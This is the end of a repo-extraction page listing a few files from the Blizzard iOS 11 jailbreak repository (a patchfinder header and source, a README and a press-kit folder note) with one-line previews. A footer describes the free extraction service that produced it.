"path": "PatchFinder/patchfinder64.h",
"chars": 1733,
"preview": "#ifndef patchfinder_h\n#define patchfinder_h\n#import <stdint.h>\n#import <string.h>\n#import <stdbool.h>\n#import <mach-o/fa"
},
{
"path": "PatchFinder/patchfinder64.m",
"chars": 54620,
"preview": "\n//\n// patchfinder64.c\n// extra_recipe\n//\n// Created by xerub on 06/06/2017.\n// Copyright © 2017 xerub. All rights r"
},
{
"path": "README.md",
"chars": 1369,
"preview": "# Blizzard Jailbreak\nAn Open-Source iOS 11.0 to 11.4.1 Jailbreak. \n\nThis jailbreak is aimed at the beginner Jailbreak De"
},
{
"path": "Vanity/readme.md",
"chars": 64,
"preview": "This folder contains the logo, wallpapers and other press kits.\n"
}
]
// ... and 9 more files (download for full content)
About this extraction
This page contains the full source code of the GeoSn0w/Blizzard-Jailbreak GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 102 files (832.6 KB), approximately 235.6k tokens, and a symbol index with 442 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.